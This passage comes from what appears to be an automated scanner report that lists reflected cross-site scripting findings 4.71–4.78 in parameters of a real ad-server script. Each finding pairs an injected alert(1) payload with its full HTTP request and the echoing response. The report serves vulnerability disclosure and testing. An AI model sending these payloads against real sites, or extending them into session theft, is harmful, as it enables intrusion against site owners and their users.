1031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:20 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true1dd00"-alert(1)-"646a0cac324&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxup
...[SNIP]...

4.71. http://as.jivox.com/player/jivox_ad_tags.php [campaignId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab7c"-alert(1)-"c02051b26b was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=190938ab7c"-alert(1)-"c02051b26b&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:05 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57659
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
p://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=190938ab7c"-alert(1)-"c02051b26b&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxha
...[SNIP]...

4.72. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the clickTagURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c841c'%3balert(1)//719d9a49b95 was submitted in the clickTagURL parameter. This input was echoed as c841c';alert(1)//719d9a49b95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.comc841c'%3balert(1)//719d9a49b95&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:12 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57690
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
hYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.comc841c';alert(1)//719d9a49b95" target="_blank">
...[SNIP]...

4.73. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the clickTagURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa1a"-alert(1)-"d02b9250581 was submitted in the clickTagURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.comcfa1a"-alert(1)-"d02b9250581&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:09 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57688
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
mNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.comcfa1a"-alert(1)-"d02b9250581&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.
...[SNIP]...

4.74. http://as.jivox.com/player/jivox_ad_tags.php [iframeTag parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the iframeTag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec57f"-alert(1)-"6c64bcf253 was submitted in the iframeTag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=onec57f"-alert(1)-"6c64bcf253&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:57 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57659
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
250);
jvxAdPlayer.setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=onec57f"-alert(1)-"6c64bcf253&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5Nj
...[SNIP]...

4.75. http://as.jivox.com/player/jivox_ad_tags.php [jivoxBranded parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the jivoxBranded request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57b6e"-alert(1)-"b2e0605808c was submitted in the jivoxBranded parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false57b6e"-alert(1)-"b2e0605808c&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:46 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
kMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false57b6e"-alert(1)-"b2e0605808c&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvxSessionId=130796302
...[SNIP]...

4.76. http://as.jivox.com/player/jivox_ad_tags.php [maxAds parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the maxAds request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 251ba"-alert(1)-"51984580583 was submitted in the maxAds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3251ba"-alert(1)-"51984580583&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:24 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3251ba"-alert(1)-"51984580583&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.
...[SNIP]...

4.77. http://as.jivox.com/player/jivox_ad_tags.php [mouseAction parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the mouseAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65140"-alert(1)-"00b5d1dee29 was submitted in the mouseAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver65140"-alert(1)-"00b5d1dee29&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:16 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
HN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver65140"-alert(1)-"00b5d1dee29&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=
...[SNIP]...

4.78. http://as.jivox.com/player/jivox_ad_tags.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78c54"-alert(1)-"6fea4a27bbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
